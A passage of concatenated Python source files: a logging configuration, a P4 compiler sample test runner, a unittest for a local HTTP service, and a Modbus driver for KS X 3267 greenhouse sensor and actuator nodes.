'format': '\33[90m %(message)s \33[0m',
},
'console-warning': {
'class': 'logging.Formatter',
'format': '\33[93m%(message)s \33[0m',
},
'console-error': {
'class': 'logging.Formatter',
'format': '\033[91m%(levelname)-8s %(processName)-10s %(message)s \033[0m',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'level': 'INFO',
'formatter': 'console',
'filters': ['info']
},
'console-verbose': {
'class': 'logging.StreamHandler',
'level': 15,
'formatter': 'console-verbose',
'filters': ['verbose']
},
'console-warning': {
'class': 'logging.StreamHandler',
'level': 'WARNING',
'formatter': 'console-warning',
'filters': ['warning']
},
'console-error': {
'class': 'logging.StreamHandler',
'level': 'ERROR',
'formatter': 'console-error',
'filters': ['error']
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'filename': config.log.file,
'mode': 'w',
'backupCount': 3,
'maxBytes': config.log.max_file_size,
'formatter': 'detailed',
},
},
'loggers':{
'kervi':{
'handlers': ['console', 'file']
}
},
'root': {
'level': log_level,
'handlers': ['console', 'console-verbose', 'console-warning', 'console-error', 'file']
},
}
logging.config.dictConfig(log_config)
self._log_queue = Queue()
self._logging_thread = threading.Thread(target=logger_thread, args=(self._log_queue,))
self._logging_thread.deamon = True
if platform.system() == "Windows":
self._logging_thread.start()
#return KerviLog("application")
def stop(self):
self._log_queue.put_nowait(None)
|
run-p4-sample.py
|
#!/usr/bin/env python2
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Runs the compiler on a sample P4 V1.2 program
from __future__ import print_function
from subprocess import Popen,PIPE
from threading import Thread
import errno
import sys
import re
import os
import stat
import tempfile
import shutil
import difflib
import subprocess
import glob
SUCCESS = 0
FAILURE = 1
class Options(object):
def __init__(self):
self.binary = "" # this program's name
self.cleanupTmp = True # if false do not remote tmp folder created
self.p4filename = "" # file that is being compiled
self.compilerSrcDir = "" # path to compiler source tree
self.verbose = False
self.replace = False # replace previous outputs
self.dumpToJson = False
self.compilerOptions = []
self.runDebugger = False
self.generateP4Runtime = False
def usage(options):
name = options.binary
print(name, "usage:")
print(name, "rootdir [options] file.p4")
print("Invokes compiler on the supplied file, possibly adding extra arguments")
print("`rootdir` is the root directory of the compiler source tree")
print("options:")
print(" -b: do not remove temporary results for failing tests")
print(" -v: verbose operation")
print(" -f: replace reference outputs with newly generated ones")
print(" -a \"args\": pass args to the compiler")
print(" --p4runtime: generate P4Info message in text format")
def isError(p4filename):
# True if the filename represents a p4 program that should fail
return "_errors" in p4filename
def ignoreStderr(options):
for line in open(options.p4filename):
if "P4TEST_IGNORE_STDERR" in line:
return True
return False
class Local(object):
# object to hold local vars accessable to nested functions
pass
def run_timeout(options, args, timeout, stderr):
if options.verbose:
print(args[0], args[len(args) - 1]) # handy for manual cut-and-paste
print(" ".join(args))
local = Local()
local.process = None
local.filter = None
def target():
procstderr = None
if stderr is not None:
# copy stderr to the specified file, stripping file path prefixes
# from the start of lines
outfile = open(stderr, "w")
# This regex is ridiculously verbose; it's written this way to avoid
# features that are not supported on both GNU and BSD (i.e., macOS)
# sed. BSD sed's character class support is not great; for some
# reason, even some character classes that the man page claims are
# available don't seem to actually work.
local.filter = Popen(['sed', '-E',
r's|^[-[:alnum:][:punct:][:space:]_/]*/([-[:alnum:][:punct:][:space:]_]+\.[ph]4?[:(][[:digit:]]+)|\1|'],
stdin=PIPE, stdout=outfile)
procstderr = local.filter.stdin
local.process = Popen(args, stderr=procstderr)
local.process.wait()
if local.filter is not None:
local.filter.stdin.close()
local.filter.wait()
thread = Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print("Timeout ", " ".join(args), file=sys.stderr)
local.process.terminate()
thread.join()
if local.process is None:
# never even started
if options.verbose:
print("Process failed to start")
return -1
if options.verbose:
print("Exit code ", local.process.returncode)
return local.process.returncode
timeout = 10 * 60
def compare_files(options, produced, expected):
if options.replace:
if options.verbose:
print("Saving new version of ", expected)
shutil.copy2(produced, expected)
return SUCCESS
if options.verbose:
print("Comparing", expected, "and", produced)
cmd = ("diff -B -u -w " + expected + " " + produced + " >&2")
if options.verbose:
print(cmd)
exitcode = subprocess.call(cmd, shell=True);
if exitcode == 0:
return SUCCESS
else:
return FAILURE
def recompile_file(options, produced, mustBeIdentical):
# Compile the generated file a second time
secondFile = produced + "-x";
args = ["./p4test", "-I.", "--pp", secondFile, "--std", "p4-16", produced] + \
options.compilerOptions
result = run_timeout(options, args, timeout, None)
if result != SUCCESS:
return result
if mustBeIdentical:
result = compare_files(options, produced, secondFile)
return result
def check_generated_files(options, tmpdir, expecteddir):
files = os.listdir(tmpdir)
for file in files:
if options.verbose:
print("Checking", file)
produced = tmpdir + "/" + file
expected = expecteddir + "/" + file
if not os.path.isfile(expected):
if options.verbose:
print("Expected file does not exist; creating", expected)
shutil.copy2(produced, expected)
else:
result = compare_files(options, produced, expected)
if result != SUCCESS and (file[-7:] != "-stderr" or not ignoreStderr(options)):
return result
return SUCCESS
def file_name(tmpfolder, base, suffix, ext):
return tmpfolder + "/" + base + "-" + suffix + ext
def process_file(options, argv):
assert isinstance(options, Options)
tmpdir = tempfile.mkdtemp(dir=".")
basename = os.path.basename(options.p4filename)
base, ext = os.path.splitext(basename)
dirname = os.path.dirname(options.p4filename)
if "_samples/" in dirname:
expected_dirname = dirname.replace("_samples/", "_samples_outputs/", 1)
elif "_errors/" in dirname:
expected_dirname = dirname.replace("_errors/", "_errors_outputs/", 1)
elif "p4_14/" in dirname:
expected_dirname = dirname.replace("p4_14/", "p4_14_outputs/", 1)
elif "p4_16/" in dirname:
expected_dirname = dirname.replace("p4_16/", "p4_16_outputs/", 1)
else:
expected_dirname = dirname + "_outputs" # expected outputs are here
if not os.path.exists(expected_dirname):
os.makedirs(expected_dirname)
# We rely on the fact that these keys are in alphabetical order.
rename = { "FrontEndDump": "first",
"FrontEndLast": "frontend",
"MidEndLast": "midend" }
if options.verbose:
print("Writing temporary files into ", tmpdir)
ppfile = tmpdir + "/" + basename # after parsing
referenceOutputs = ",".join(rename.keys())
stderr = tmpdir + "/" + basename + "-stderr"
p4runtimefile = tmpdir + "/" + basename + ".p4info.txt"
# Create the `json_outputs` directory if it doesn't already exist. There's a
# race here since multiple tests may run this code in parallel, so we can't
# check if it exists beforehand.
try:
os.mkdir("./json_outputs")
except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else:
raise
jsonfile = "./json_outputs" + "/" + basename + ".json"
# P4Info generation requires knowledge of the architecture, so we must
# invoke the compiler with a valid --arch.
def getArch(path):
v1Pattern = re.compile('include.*v1model\.p4')
psaPattern = re.compile('include.*psa\.p4')
with open(path, 'r') as f:
for line in f:
if v1Pattern.search(line):
return "v1model"
elif psaPattern.search(line):
return "psa"
return None
if not os.path.isfile(options.p4filename):
raise Exception("No such file " + options.p4filename)
args = ["./p4test", "--pp", ppfile, "--dump", tmpdir, "--top4", referenceOutputs,
"--testJson"] + options.compilerOptions
arch = getArch(options.p4filename)
if arch is not None:
args.extend(["--arch", arch])
if options.generateP4Runtime:
args.extend(["--p4runtime-files", p4runtimefile])
if "p4_14" in options.p4filename or "v1_samples" in options.p4filename:
args.extend(["--std", "p4-14"]);
args.extend(argv)
if options.runDebugger:
args[0:0] = options.runDebugger.split()
os.execvp(args[0], args)
result = run_timeout(options, args, timeout, stderr)
if result != SUCCESS:
print("Error compiling")
print("".join(open(stderr).readlines()))
# If the compiler crashed fail the test
if 'Compiler Bug' in open(stderr).readlines():
return FAILURE
expected_error = isError(options.p4filename)
if expected_error:
# invert result
if result == SUCCESS:
result = FAILURE
else:
result = SUCCESS
# Canonicalize the generated file names
lastFile = None
for k in sorted(rename.keys()):
files = glob.glob(tmpdir + "/" + base + "*" + k + "*.p4");
if len(files) > 1:
print("Multiple files matching", k);
elif len(files) == 1:
file = files[0]
if os.path.isfile(file):
newName = file_name(tmpdir, base, rename[k], ext)
os.rename(file, newName)
lastFile = newName
if (result == SUCCESS):
result = check_generated_files(options, tmpdir, expected_dirname);
if (result == SUCCESS) and (not expected_error):
result = recompile_file(options, ppfile, False)
if (result == SUCCESS) and (not expected_error) and (lastFile is not None):
# Unfortunately compilation and pretty-printing of lastFile is
# not idempotent: For example a constant such as 8s128 is
# converted by the compiler to -8s128.
result = recompile_file(options, lastFile, False)
if options.cleanupTmp:
if options.verbose:
print("Removing", tmpdir)
shutil.rmtree(tmpdir)
return result
def isdir(path):
try:
return stat.S_ISDIR(os.stat(path).st_mode)
except OSError:
return False;
######################### main
def main(argv):
options = Options()
options.binary = argv[0]
if len(argv) <= 2:
usage(options)
sys.exit(FAILURE)
options.compilerSrcdir = argv[1]
argv = argv[2:]
if not os.path.isdir(options.compilerSrcdir):
print(options.compilerSrcdir + " is not a folder", file=sys.stderr)
usage(options)
sys.exit(FAILURE)
while argv[0][0] == '-':
if argv[0] == "-b":
options.cleanupTmp = False
elif argv[0] == "-v":
options.verbose = True
elif argv[0] == "-f":
options.replace = True
elif argv[0] == "-j":
options.dumpToJson = True
elif argv[0] == "-a":
if len(argv) == 0:
print("Missing argument for -a option")
usage(options)
sys.exit(FAILURE)
else:
options.compilerOptions += argv[1].split();
argv = argv[1:]
elif argv[0][1] == 'D' or argv[0][1] == 'I' or argv[0][1] == 'T':
options.compilerOptions.append(argv[0])
elif argv[0] == "-gdb":
options.runDebugger = "gdb --args"
elif argv[0] == "--p4runtime":
options.generateP4Runtime = True
else:
print("Uknown option ", argv[0], file=sys.stderr)
usage(options)
sys.exit(FAILURE)
argv = argv[1:]
if 'P4TEST_REPLACE' in os.environ:
options.replace = True
options.p4filename=argv[-1]
options.testName = None
if options.p4filename.startswith(options.compilerSrcdir):
options.testName = options.p4filename[len(options.compilerSrcdir):];
if options.testName.startswith('/'):
options.testName = options.testName[1:]
if options.testName.endswith('.p4'):
options.testName = options.testName[:-3]
result = process_file(options, argv)
if isError(options.p4filename) and result == FAILURE:
print("Program was expected to fail")
sys.exit(result)
if __name__ == "__main__":
main(sys.argv)
|
test_httpservice.py
|
import threading
import unittest
import urllib.request
from httpservice.app import Server, parsePort
from http.server import HTTPServer
import time
# Extended Class to remove output to stdout in test
class QuietServer(Server):
def log_message(self, *args):
pass
class TestRequests(unittest.TestCase):
def test_shortArgParse(self):
parser = parsePort(['-p', '9092'])
self.assertEqual(parser, 9092)
def setUp(self):
self.server = HTTPServer(("localhost", 9092), QuietServer)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def test_route_helloworld(self):
res = urllib.request.urlopen('http://localhost:9092/helloworld')
self.assertEqual(res.code, 200)
self.assertEqual(res.read(), bytes('Hello Stranger', 'UTF-8'))
def test_route_versionz(self):
route = urllib.request.urlopen('http://localhost:9092/versionz')
self.assertEqual(route.code, 200)
def tearDown(self):
self.server.shutdown()
self.server.server_close()
if __name__ == '__main__':
unittest.main()
|
mate_ksx3267v2.py
|
#!/usr/bin/env python
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 JiNong, Inc.
# All right reserved.
#
import struct
import time
import socket
import select
import traceback
import hashlib
import json
from enum import IntEnum
from threading import Thread, Lock
from mate import Mate, ThreadMate, DevType
from mblock import MBlock, BlkType, StatCode, ResCode, CmdCode, Observation, Request, Response, NotiCode, Notice
from pymodbus.client.sync import ModbusSerialClient
from pymodbus.client.sync import ModbusTcpClient
class NodeType(IntEnum):
SENNODE = 1
ACTNODE = 2
INTNODE = 3
NUTNODE = 4
class ProtoVer(IntEnum):
KS_X_3267_2018 = 101
TTA_1 = 201
class KSX3267MateV2(ThreadMate):
_SLEEP = 0.5
_VERSION = "KSX3267_0.1"
_KEYWORDS = {"value" : (2, "float"), "status" : (1, "status"),
"opid" : (1, "short"), "state-hold-time" : (2, "int"), "ratio": (1, "short"),
"position" : (1, "short"), "remain-time" : (2, "int"),
"control": (1, "control"), "area" : (1, "short"), "alert" : (1, "alert"),
"hold-time" : (2, "int"), "operation" : (1, "operation"),
"time" : (2, "int"), "opentime" : (1, "short"), "closetime" : (1, "short"),
"EC": (2, "float"), "pH": (2, "float"), "on-sec" : (1, "short"),
"start-area" : (1, "short"), "stop-area": (1, "short"),
"epoch" : (2, "int"), "vfloat": (2, "float"), "vint" : (2, "int")}
_DEVINFOREG = 2
_DEVCODEREG = 101
def __init__(self, option, devinfo, coupleid, logger):
super(KSX3267MateV2, self).__init__(option, devinfo, coupleid, logger)
self._timeout = 3 if "timeout" not in option else option["timeout"]
self._conn = {}
self._tempthd = []
self._isdetecting = False
self._detection = {"port": [], "saddr":0, "eaddr":0, "opid":0}
#self._nodes = self._devinfo.getgw()["children"]
self._lock = Lock()
self._logger.info("KSX3267MateV2 Started.")
def detect_node(self, conn, unit, registers):
print "detect_node", unit, registers
compcode = registers[0]
nodecode = registers[2]
size = registers[4]
while True:
res = self.readregister(conn, KSX3267MateV2._DEVCODEREG, size, unit)
if res is None or res.isError():
self._logger.warn("Fail to get devices from " + str(unit) + " " + str(res))
return None
if len(res.registers) != size:
self._logger.info("retry to get data since size of data is not matched. " + str(size) + " " + str(len(res.registers)))
continue
return {"compcode" : compcode, "nodecode" : nodecode, "devcodes": res.registers}
def getdk(self, dev, idx):
dk = json.loads(dev["dk"])
return dk[idx]
def setdetection(self, flag, opid=0):
self._isdetecting = flag
self._detection["opid"] = opid
def startdetection(self, params, opid):
if self._detection["opid"] != 0:
self._logger.info("detection is processing.... so this command would be ignored.")
return ResCode.FAIL
self.setdetection(True, opid)
if params:
self._detection["saddr"] = params['saddr']
self._detection["eaddr"] = params['eaddr']
self._detection["port"] = params['port']
else:
self._detection["saddr"] = 1
self._detection["eaddr"] = 5
self._detection["port"] = None
return ResCode.OK
def readregister(self, conn, addr, count, unit):
print "....... before lock for read"
with self._lock:
time.sleep(KSX3267MateV2._SLEEP)
print "read register", unit, addr, count
try:
return conn.read_holding_registers(addr, count, unit=unit)
except Exception as ex:
self._logger.warn("fail to read holding registers. : " + str(ex))
return None
def detect(self):
detected = {}
for port, conn in self._conn.iteritems():
if self._isdetecting == False or self.isexecuting() == False:
self._logger.info("Total detection is canceled.")
break
info = self.detectone(port, conn)
detected[port] = info
self._logger.info ("finished to detect devices : " + str(detected))
noti = Notice(None, NotiCode.DETECT_FINISHED) # Detection Started
if noti:
noti.setkeyvalue("opid", self._detection["opid"])
for port, info in detected.iteritems():
noti.setcontent(port, info)
self.writecb(noti)
self.setdetection(False)
def detectone(self, port, conn):
detected = {}
if self._detection["port"] is not None and port not in self._detection["port"]:
return detected
for unit in range(self._detection["saddr"], self._detection["eaddr"]):
if self._isdetecting == False or self.isexecuting() == False:
self._logger.info("A port " + str(port) + " detection is canceled.")
break
tempid = port + "-" + str(unit)
noti = Notice(None, NotiCode.DETECT_NODE_STARTED, devid=tempid) # Detection Started
if noti:
noti.setkeyvalue("opid", self._detection["opid"])
self.writecb(noti)
noti = None
info = None
res = None
for _ in range(3):
res = self.readregister(conn, KSX3267MateV2._DEVINFOREG, 6, unit)
if res is None or res.isError():
continue
if len(res.registers) != 6:
self._logger.info("retry to get data since size of data is not matched. 6 " + str(len(res.registers)))
continue
break
if res is None or res.isError():
noti = Notice(None, NotiCode.DETECT_NO_NODE, devid=tempid) # Detection Started
self._logger.info ("Fail to get information from a node : " + str(unit) + " " + str(res))
elif res.registers[1] in (NodeType.SENNODE, NodeType.ACTNODE, NodeType.INTNODE): # device type
if res.registers[3] == ProtoVer.KS_X_3267_2018:
info = self.detect_node(conn, unit, res.registers)
self._logger.info ("Found a node : " + str(unit) + " " + str(info))
else:
noti = Notice(None, NotiCode.DETECT_UNKNOWN_PROTOCOL_VER, devid=tempid) # unknown protocol version
elif res.registers[1] == NodeType.NUTNODE:
if res.registers[3] == ProtoVer.TTA_1:
info = self.detect_node(conn, unit, res.registers)
self._logger.info ("Found a nutrient system : " + str(unit) + " " + str(info))
else:
noti = Notice(None, NotiCode.DETECT_UNKNOWN_PROTOCOL_VER, devid=tempid) # unknown protocol version
else:
noti = Notice(unit, NotiCode.DETECT_UNKNOWN_NODE, devid=tempid) # unknown device
if noti is None:
if info is None:
noti = Notice(None, NotiCode.DETECT_WRONG_DEVICE, devid=tempid) # fail to find a node
else:
noti = Notice(None, NotiCode.DETECT_NODE_DETECTED, devid=port, content={unit : info}) # found a node
detected[unit] = info
noti.setkeyvalue("opid", self._detection["opid"])
print "noti", noti.stringify()
self.writecb(noti)
time.sleep(0.1)
return detected
def canceldetection(self, params):
time.sleep(self._timeout)
noti = Notice(None, NotiCode.DETECT_CANCELED) # detection is canceled
noti.setkeyvalue("opid", self._detection["opid"])
self.writecb(noti)
self.setdetection(False)
return ResCode.OK
def _listen(self, opt):
try:
servsoc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
servsoc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
servsoc.bind((opt['host'], opt['port']))
servsoc.listen(1)
self._logger.info("listen : " + str(opt))
executing = True
while executing:
self._logger.info("waiting a client~")
rsoc, wsoc, esoc = select.select([servsoc], [], [], 10)
for sock in rsoc:
if sock == servsoc:
clisoc, address = servsoc.accept()
self._logger.info("client connected from " + str(address))
for tmp in self._tempthd:
if tmp["port"] == opt["port"]:
conn = ModbusTcpClient(timeout=self._timeout)
conn.socket = clisoc
self._conn[opt["port"]] = conn
tmp["status"] = 10 # connected
executing = False
except Exception as ex:
servsoc.close()
for tmp in self._tempthd:
if tmp["port"] == opt["port"]:
self._logger.warn(" port [" + str(opt["port"]) + "] exception : " + str(ex))
tmp["status"] = 5 # error
def listen(self, opt):
tmp = {"thd" : Thread(target=self._listen, args=(opt)), "status": 0, "port":opt['port']}
self._tempthd.append(tmp)
tmp["thd"].start()
def checktempthreads(self):
for tmp in self._tempthd:
if tmp["status"] > 2:
tmp["thd"].stop()
tmp["thd"].join()
def connectone(self, opt):
ret = False
conn = None
if opt['method'] == 'rtu':
conn = ModbusSerialClient(method='rtu', port=opt['port'],
timeout=self._timeout, baudrate=opt['baudrate'])
ret = conn.connect()
msg = "failed to connect with rtu"
code = NotiCode.RTU_CONNECTED if ret else NotiCode.RTU_FAILED_CONNECTION
elif opt['method'] == 'tcpc':
conn = ModbusTcpClient(opt['host'], port=opt['port'], timeout=self._timeout)
ret = conn.connect()
msg = "failed to connect with tcp"
code = NotiCode.TCP_CONNECTED if ret else NotiCode.RTU_FAILED_CONNECTION
elif opt['method'] == 'tcpcs':
self._logger.info("It would wait for a while to connect a client.")
ret = self.listen(opt)
msg = "failed to connect with tcp"
code = NotiCode.TCP_WAITING if ret else NotiCode.RTU_FAILED_CONNECTION
conn = None
else:
msg = "It's a wrong connection method. " + str(opt['method'])
if ret == False:
self._logger.warn(msg)
noti = Notice(None, NotiCode.RTU_FAILED_CONNECTION) # detection is canceled
else:
noti = Notice(None, NotiCode.RTU_CONNECTED) # detection is canceled
self.writecb(noti)
return conn
def connect(self):
ret = False
for opt in self._option['conn']:
conn = self.connectone(opt)
if conn:
self._conn[opt["port"][8:]] = conn
super(KSX3267MateV2, self).connect()
return ret
def closeone(self, port):
self._conn[port].close()
def close(self):
for port in self._conn.keys():
self.closeone(port)
super(KSX3267MateV2, self).close()
def readmsg(self):
self._msgq = []
for gw in self._devinfo:
for nd in gw["children"]:
self._msgq.append(self.readsensornodeinfo(nd))
if self._isdetecting:
self.detect()
self.checktempthreads()
def processrequest(self, dev, request, node):
gw = self._devinfo.findgateway(request.getnodeid())
unit = self.getdk(dev, 0)
operation = request.getcommand()
params = request.getparams()
params["operation"] = operation # need to convert by case
params["opid"] = request.getopid() # need to convert by case
properparams = CmdCode.getparams(operation) + ["operation", "opid"]
registers = []
for key in self.getdk(dev, 4):
if key not in properparams:
# key param is not used for this operation
# However, the register should be filled.
val = 0
elif key in params:
val = params[key]
else:
self._logger.warn("Wrong Keyword : " + str(key))
return ResCode.FAIL_WRONG_KEYWORD
if KSX3267MateV2._KEYWORDS[key][0] == 1:
registers.append(val)
elif KSX3267MateV2._KEYWORDS[key][1] == "int":
registers.extend(struct.unpack('HH', struct.pack('i', val)))
elif KSX3267MateV2._KEYWORDS[key][1] == "float":
registers.extend(struct.unpack('HH', struct.pack('f', val)))
#else:
# self._logger.warn("This param is needed for this operation. " + str(params['operation']) + ", " + str(key))
# return ResCode.FAIL_WRONG_KEYWORD
print "....... befor lock for write"
with self._lock:
time.sleep(KSX3267MateV2._SLEEP)
print "....... lock for write", self.getdk(dev, 3), registers
res = self._conn[gw["dk"]].write_registers(self.getdk(dev, 3), registers, unit=unit)
if res.isError():
self._logger.warn("Fail to write a request to dev." + str(dev) + "," + str(res) + ":" + str(request))
return ResCode.FAIL_TO_WRITE
msg = self.readactinfo(node, dev)
if msg is None:
self._logger.warn("Fail to read dev status.")
else:
self.sendnoticeforactuatorstatus(msg)
return ResCode.OK
def writeblk(self, blk):
print "received message", blk.getdevid(), self._coupleid
if BlkType.isrequest(blk.gettype()) is False:
self._logger.warn("The message is not request. " + str(blk.gettype()))
return False
response = Response(blk)
cmd = blk.getcommand()
nd = self._devinfo.finddevbyid(blk.getnodeid())
dev = self._devinfo.finddevbyid(blk.getdevid())
if blk.getdevid() == self._coupleid:
params = blk.getparams()
if cmd == CmdCode.DETECT_DEVICE:
print "detect device"
code = self.startdetection(params, blk.getopid())
elif cmd == CmdCode.CANCEL_DETECT:
print "cancel to detect device"
code = self.canceldetection(params)
else:
self._logger.warn("Unknown Error. " + str(blk) + ", " + str(dev))
code = ResCode.FAIL
elif dev is None:
self._logger.warn("There is no device. " + str(blk.getdevid()))
code = ResCode.FAIL_NO_DEVICE
elif DevType.ispropercommand(dev['dt'], cmd) is False:
self._logger.warn("The request is not proper. " + str(cmd) + " " + str(dev['dt']))
code = ResCode.FAIL_NOT_PROPER_COMMAND
elif DevType.isactuator(dev['dt']) or DevType.isnode(dev['dt']):
# modbus
code = self.processrequest(dev, blk, nd)
self._logger.info("Actuator processed : " + str(code))
elif DevType.isgateway(dev['dt']):
self._logger.info("Gateway does not receive a request")
code = ResCode.FAIL
else:
self._logger.warn("Unknown Error. " + str(blk) + ", " + str(dev))
code = ResCode.FAIL
response.setresult(code)
self._logger.info("write response: " + str(response))
self.writecb(response)
return True #if code == ResCode.OK else False
def parseregisters(self, names, values):
idx = 0
ret = {}
for nm in names:
(size, vtype) = KSX3267MateV2._KEYWORDS[nm]
if vtype == "float":
val = struct.unpack('f', struct.pack('HH', values[idx], values[idx+1]))[0]
elif vtype == "int":
val = struct.unpack('i', struct.pack('HH', values[idx], values[idx+1]))[0]
else:
val = values[idx]
ret[nm] = val
idx = idx + size
print "parsed", ret
return ret
def readinfofromdev(self, conn, dev):
size = self.getsize(self.getdk(dev, 2))
#for _ in range(3):
res = self.readregister(conn, self.getdk(dev, 1), size, self.getdk(dev, 0))
if res is None:
self._logger.warn("fail to get status from " + str(dev['dk']))
# break
elif res.isError():
self._logger.info("retry to get status from " + str(dev['dk']) + " " + str(res))
# continue
else:
if len(res.registers) == size:
return self.parseregisters(self.getdk(dev, 2), res.registers)
else:
self._logger.info("retry to get data since size of data is not matched. " + str(size) + " " + str(len(res.registers)))
return None
def readnodeinfo(self, node):
ret = {"id" : node["id"], "sen" : {}, "act" : {}, "nd" : {"status":StatCode.ERROR.value}}
gw = self._devinfo.findgateway(node["id"])
conn = self._conn[gw["dk"]]
ret["conn"] = conn
info = self.readinfofromdev(conn, node)
if info:
ret["nd"] = info
else:
self._logger.warn("fail to read node info : " + str(node))
return ret
def readsensornodeinfo(self, node):
ret = self.readnodeinfo(node)
for dev in node['children']:
if DevType.issensor(dev["dt"]):
info = self.readinfofromdev(ret["conn"], dev)
if info:
ret["sen"][dev["id"]] = info
#else:
# self._logger.warn("fail to read sensor info : " + str(dev) + " however continue to read other device")
return ret
def readactnodeinfo(self, node):
ret = self.readnodeinfo(node)
for dev in node['children']:
if DevType.issensor(dev["dt"]) == False:
info = self.readinfofromdev(ret["conn"], dev)
if info:
ret["act"][dev["id"]] = info
else:
self._logger.warn("fail to read actuator info : " + str(dev) + " however continue to read other device")
return ret
def readactinfo(self, node, act):
ret = self.readnodeinfo(node)
info = self.readinfofromdev(ret["conn"], act)
if info:
ret["act"][act["id"]] = info
else:
self._logger.warn("fail to read actuator info : " + str(act) + " however continue to read other device")
return ret
def sendobs(self):
for msg in self._msgq:
if msg is None:
continue
self.sendobservation(msg)
def sendnoti(self):
for gw in self._devinfo:
for node in gw["children"]:
ret = self.readnodeinfo(node)
i = 1
for dev in node['children']:
if DevType.issensor(dev["dt"]) == False:
info = self.readinfofromdev(ret["conn"], dev)
if info:
ret["act"][dev["id"]] = info
i = i + 1
if i % 3 == 0:
self.sendnoticeforactuatorstatus(ret)
ret["act"] = {}
self.sendnoticeforactuatorstatus(ret)
def sendobservation(self, ndinfo):
if StatCode.has_value(ndinfo["nd"]["status"]) == False:
ndinfo["nd"]["status"] = StatCode.ERROR.value
obsblk = Observation(ndinfo["id"])
obsblk.setobservation(ndinfo["id"], 0, StatCode(ndinfo["nd"]["status"]))
for devid, info in ndinfo["sen"].iteritems():
if StatCode.has_value(info["status"]) == False:
info["status"] = StatCode.ERROR.value
obsblk.setobservation(devid, info["value"], StatCode(info["status"]))
# do not send observation for actuator
#for devid, info in ndinfo["act"].iteritems():
# if StatCode.has_value(info["status"]) == False:
# info["status"] = StatCode.ERROR.value
# obsblk.setobservation(devid, 0, StatCode(info["status"]))
self.writecb(obsblk)
def sendnoticeforactuatorstatus(self, ndinfo):
blk = Notice(ndinfo["id"], NotiCode.ACTUATOR_STATUS, ndinfo["id"], ndinfo["nd"])
for devid, info in ndinfo["act"].iteritems():
blk.setcontent(devid, info)
self.writecb(blk)
def start(self, writecb):
super(KSX3267MateV2, self).start(writecb)
return True
def stop(self):
super(KSX3267MateV2, self).stop()
return True
def getsize(self, lst):
size =0
for k in lst:
if k in KSX3267MateV2._KEYWORDS:
size = size + KSX3267MateV2._KEYWORDS[k][0]
else:
self._logger.warn("wrong keyword : " + str(k))
return -1
return size
if __name__ == "__main__":
isnutri = False
opt = {
'conn' : [{
'method': 'rtu',
'port' : '/dev/ttyJND2',
'baudrate' : 9600,
'timeout': 5
}]
}
nutriinfo = [{
"id" : "1", "dk" : "", "dt": "gw", "children" : [{
"id" : "101", "dk" : '[1,40201,["status"],45001,["operation","opid"]]', "dt": "nd", "children" : [
{"id" : "102", "dk" : '[1,40211,["control","status","area","alert","opid"],45001,["operation", "opid", "control","EC","pH", "start-area", "stop-area", "on-sec"]]', "dt": "nutrient-supply/level1"},
{"id" : "103", "dk" : '[1,40221,["value","status"]]', "dt": "sen"},
{"id" : "104", "dk" : '[1,40231,["value","status"]]', "dt": "sen"},
{"id" : "105", "dk" : '[1,40241,["value","status"]]', "dt": "sen"},
{"id" : "106", "dk" : '[1,40251,["value","status"]]', "dt": "sen"},
{"id" : "107", "dk" : '[1,40261,["value","status"]]', "dt": "sen"},
{"id" : "109", "dk" : '[1,40271,["value","status"]]', "dt": "sen"},
{"id" : "110", "dk" : '[1,40281,["value","status"]]', "dt": "sen"},
{"id" : "111", "dk" : '[1,40291,["value","status"]]', "dt": "sen"},
{"id" : "112", "dk" : '[1,40301,["value","status"]]', "dt": "sen"},
{"id" : "113", "dk" : '[1,40311,["value","status"]]', "dt": "sen"}
]}
]}
]
devinfo = [{
"id" : "1", "dk" : "JND2", "dt": "gw", "children" : [
# {
# "id" : "101", "dk" : '[1,201,["status"],301,["operation","opid"]]', "dt": "nd", "children" : [
#{"id" : "102", "dk" : '[1,210,["value","status"]]', "dt": "sen"},
#{"id" : "103", "dk" : '[1,220,["value","status"]]', "dt": "sen"}
# "id" : "101", "dk" : '[1,40201,["status"],45001,["operation","opid"]]', "dt": "nd", "children" : [
#{"id" : "102", "dk" : '[1,41010,["value","status"]]', "dt": "sen"},
#{"id" : "103", "dk" : '[1,41020,["value","status"]]', "dt": "sen"}
# {"id" : "102", "dk" : '[1,40202,["value","status"]]', "dt": "sen"},
# {"id" : "103", "dk" : '[1,40205,["value","status"]]', "dt": "sen"},
#{"id" : "104", "dk" : '[1,40208,["value","status"]]', "dt": "sen"},
# {"id" : "105", "dk" : '[1,40211,["value","status"]]', "dt": "sen"},
#{"id" : "106", "dk" : '[1,40251,["value","status"]]', "dt": "sen"},
#{"id" : "107", "dk" : '[1,40261,["value","status"]]', "dt": "sen"},
#{"id" : "108", "dk" : '[1,40271,["value","status"]]', "dt": "sen"},
#{"id" : "109", "dk" : '[1,40281,["value","status"]]', "dt": "sen"},
#{"id" : "110", "dk" : '[1,40291,["value","status"]]', "dt": "sen"}
# ]
# }
]
}]
"""
}, {
"id" : "201", "dk" : '[2,40201,["status"],45001,["operation","opid"]]', "dt": "nd", "children" : [
{"id" : "202", "dk" : '[2,40202,["opid","status","state-hold-time","remain-time"],40206,["operation","opid","time"]]', "dt": "act/retractable/level1"},
{"id" : "202", "dk" : '[2,40209,["opid","status","state-hold-time","remain-time"],40213,["operation","opid","time"]]', "dt": "act/retractable/level1"},
{"id" : "203", "dk" : '[2,40216,["value","status"]]', "dt": "sen"},
{"id" : "204", "dk" : '[2,40219,["value","status"]]', "dt": "sen"},
#{"id" : "203", "dk" : (2,40221,["opid","status"],45021,["operation","opid"]), "dt": "act/switch/level0"},
#{"id" : "204", "dk" : (2,40231,["opid","status"],45031,["operation","opid"]), "dt": "act/switch/level0"},
